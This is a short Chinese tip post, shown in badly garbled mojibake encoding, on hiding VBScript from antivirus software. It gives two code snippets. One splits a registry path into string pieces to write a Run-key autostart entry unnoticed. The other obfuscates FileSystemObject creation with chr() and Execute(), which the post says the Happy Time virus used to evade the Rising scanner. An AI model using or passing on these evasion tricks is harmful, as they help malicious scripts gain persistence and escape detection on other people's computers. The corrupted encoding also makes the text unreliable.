現(xiàn)在殺毒的對vbs相當(dāng)敏感�����,只要發(fā)現(xiàn)對注冊表的xx作�,或使用vbs運(yùn)行命令(加用戶) 就可能被殺�����。下面談2方法可以簡單解決:
1.使用連接符"" 如:
Set CURObj = CreateObject("Wscript.Shell")
mhk="HK""LM\SOFT""WARE\Micr""osoft\Win""dows\Curren""tVersion\Run\"
CURObj.RegWrite ""mhk"internat.exe","internat.exe"
2.使用Execute函數(shù)(BY 動(dòng)鯊 )
一些殺毒軟件,如瑞星����,他門會(huì)監(jiān)視網(wǎng)頁中的代碼�����,一旦你創(chuàng)建了FSO或?qū)懽员?,即使是正常的腳本他也會(huì)報(bào)告危險(xiǎn)�,但是當(dāng)年新歡樂時(shí)光也用了FSO怎么就沒報(bào)警呢�����?原因是這個(gè)病毒使用Execute這個(gè)函數(shù)來躲過了防火墻,呵呵�����。病毒將這段聲明代碼轉(zhuǎn)化為字符串,然后通過Execute(String)函數(shù)執(zhí)行�,舉個(gè)例子
str="set fso=CreateObject( " chr(34) "scrip" chr(116) "ing.FileSystemObject"chr(34)")"
msgbox str
Execute str
將如上的代碼放入test.vbs中就會(huì)被創(chuàng)建FSO�����,而瑞星就不會(huì)報(bào)警
